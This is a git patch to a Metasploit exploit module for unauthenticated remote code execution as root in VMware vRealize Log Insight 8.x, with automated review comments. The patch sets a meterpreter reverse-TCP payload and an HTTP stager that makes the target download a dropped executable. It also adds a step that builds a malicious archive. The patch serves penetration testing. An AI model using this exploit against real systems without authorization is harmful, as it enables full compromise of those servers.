From 21dde19511f459b6cd411dcda305edb43d2960ba Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Fri, 8 Sep 2023 16:55:42 -0400
Subject: [PATCH] Make some final tweaks

Change strings to reference `VMware` using the proper case.
Don't include CmdStager (because it's unnecessary).
Set PrependFork to fix shell payloads.
Move CamelCase options to advanced.
---
 .../exploit/linux/http/vmware_vrli_rce.md | 4 ++--
 modules/exploits/linux/http/vmware_vrli_rce.rb | 18 +++++++++++++-----
 2 files changed, 15 insertions(+), 7 deletions(-)

diff --git a/documentation/modules/exploit/linux/http/vmware_vrli_rce.md b/documentation/modules/exploit/linux/http/vmware_vrli_rce.md
index 21907a601748..09320c9e9935 100644
--- a/documentation/modules/exploit/linux/http/vmware_vrli_rce.md
+++ b/documentation/modules/exploit/linux/http/vmware_vrli_rce.md
@@ -5,7 +5,7 @@ in any environment. This highly scalable log management solution delivers intuit
 dashboards, sophisticated analytics, and broad third-party extensibility across
 physical, virtual, and cloud environments.
 
-VMWare vRealize Log Insightis versions v8.x contain multiple vulnerabilities, such as
+VMware vRealize Log Insights versions v8.x contain multiple vulnerabilities, such as
 directory traversal, broken access control, deserialization, and information disclosure.
 When chained together, these vulnerabilities allow a remote, unauthenticated attacker to
 execute arbitrary commands on the underlying operating system as the root user.
@@ -24,7 +24,7 @@ Check [here](https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-
 For installing the vulnerable version follow the steps below,
 1. To obtain the vulnerable OVA image, first create a customer account at [VMware](https://customerconnect.vmware.com/account-registration) (trial license is sufficient)
-2. Navigate [here](https://customerconnect.vmware.com/account-registration) and download `Virtual Appliance`
+2. Navigate [here](https://customerconnect.vmware.com/downloads/details?downloadGroup=VRLI-8102&productId=1351) and download `Virtual Appliance`
 3. Import the OVA image into a virtualization software (VirtualBox is used for this case).
 4. Start the `VMware_vCenter_Log_Insight` image and proceed with the initial installation steps through the web interface of the product.
diff --git a/modules/exploits/linux/http/vmware_vrli_rce.rb b/modules/exploits/linux/http/vmware_vrli_rce.rb
index be8b99477abb..5b8ce39b3594 100644
--- a/modules/exploits/linux/http/vmware_vrli_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrli_rce.rb
@@ -10,7 +10,8 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
+  include Msf::Exploit::EXE
+  include Msf::Exploit::CmdStager::HTTP
   include Msf::Exploit::Retry
   include Msf::Exploit::FileDropper # includes register_files_for_cleanup
   prepend Msf::Exploit::Remote::AutoCheck
 
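Review bot: The commit message says CmdStager is dropped as unnecessary, but the new side of the include hunk still mixes in `Msf::Exploit::CmdStager::HTTP` next to the new `Msf::Exploit::EXE`, so the message and the include list disagree about which stager path the module keeps. Either the message should be reworded or, if the HTTP variant is what serves the generated executable to the target, that should be said inline the way the FileDropper line does, e.g. `include Msf::Exploit::CmdStager::HTTP # serves the dropped executable from SRVHOST` (confirm the wording against what `on_request_uri` actually serves before adopting it). The class header is outside the hunk.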
@@ -21,9 +22,9 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'VMWare vRealize Log Insight Unauthenticated RCE',
+        'Name' => 'VMware vRealize Log Insight Unauthenticated RCE',
         'Description' => %q{
-          VMWare vRealize Log Insights versions v8.x contains multiple vulnerabilities, such as
+          VMware vRealize Log Insights versions v8.x contains multiple vulnerabilities, such as
           directory traversal, broken access control, deserialization, and information disclosure.
           When chained together, these vulnerabilities allow a remote, unauthenticated attacker to
           execute arbitrary commands on the underlying operating system as the root user.
@@ -63,7 +64,8 @@ def initialize(info = {})
           'Type' => :linux_dropper,
           'DefaultOptions' => {
             'SSL' => true,
-            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+            'PrependFork' => true
           }
         }
       ]
@@ -86,7 +88,12 @@ def initialize(info = {})
         Opt::RPORT(443),
         OptPort.new('THRIFT_PORT', [true, 'Thrift service port', 16520]),
         OptInt.new('THRIFT_TIMEOUT', [true, 'Timeout duration for thrift service', 10]),
-        OptString.new('TARGETURI', [true, 'The URI of the VRLI web service', '/']),
+        OptString.new('TARGETURI', [true, 'The URI of the VRLI web service', '/'])
+      ]
+    )
+
+    register_advanced_options(
+      [
         OptInt.new('WaitForResponseTimeout', [ true, 'The timeout in seconds for RemotePakDownload response', 10 ]),
         OptInt.new('WaitForUpgradeDuration', [ true, 'The sleep duration in seconds for PakUpgrade process', 2 ])
       ]
@@ -246,6 +253,7 @@ def on_request_uri(cli, _request)
 
   def exploit
     # This is important check...
     fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if datastore['SRVHOST'] =~ /(127|0)\.0\.0\.(0|1)|localhost/
+    # Step 1 generate malicious TAR archive
     file_name = Rex::Text.rand_text_alpha(7)
     pak_name = "#{file_name}.pak"
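Review bot: The new description line still reads `VMware vRealize Log Insights versions v8.x contains`, which does not match the product name used two lines above in `'Name'` (`Log Insight`) and pairs a plural subject with a singular verb; the documentation hunk above carries the same `Insights` wording. A consistent line would be `VMware vRealize Log Insight versions 8.x contain multiple vulnerabilities, such as`. Both `initialize` and the `%q{}` description continue outside the hunk.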
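Review bot: `'PrependFork' => true` is added to the target's `DefaultOptions` without a comment, so the reason (fixing shell payloads, per the commit message) lives only in git history and a later reader cannot tell whether it is safe to unset. A trailing comment keeps it with the code, e.g. `'PrependFork' => true # shell payloads need to fork away from the launched dropper, see commit message` — presumably the interaction is with the dropped file being cleaned up by FileDropper, so confirm the wording. `initialize` continues outside the hunk.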
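Review bot: The two options moved into `register_advanced_options` keep the padded `[ true, ... ]` bracket style while the basic options directly above them use `[true, ...]`, so the two lists in the same method now read differently. Dropping the padding, e.g. `OptInt.new('WaitForResponseTimeout', [true, 'The timeout in seconds for RemotePakDownload response', 10]),`, keeps them consistent with the surrounding options and with the default RuboCop bracket spacing. `initialize` begins and ends outside the hunk.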
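Review bot: The added `# Step 1 generate malicious TAR archive` comment sits directly under a `# This is important check...` comment that never says what is checked, and the guard between them, `datastore['SRVHOST'] =~ /(127|0)\.0\.0\.(0|1)|localhost/`, is unanchored, so values such as `10.0.0.1` or a hostname that merely contains `localhost` are rejected as well. Anchoring it, `fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if datastore['SRVHOST'].to_s.match?(/\A(?:(?:127|0)\.0\.0\.[01]|localhost)\z/)`, keeps the intent without those false positives, and the first comment could state the reason, e.g. `# The target must be able to reach SRVHOST to fetch the dropped file, so a loopback address can never work` — presumably that is why the check exists, so confirm before wording it that way. `exploit` continues past the hunk.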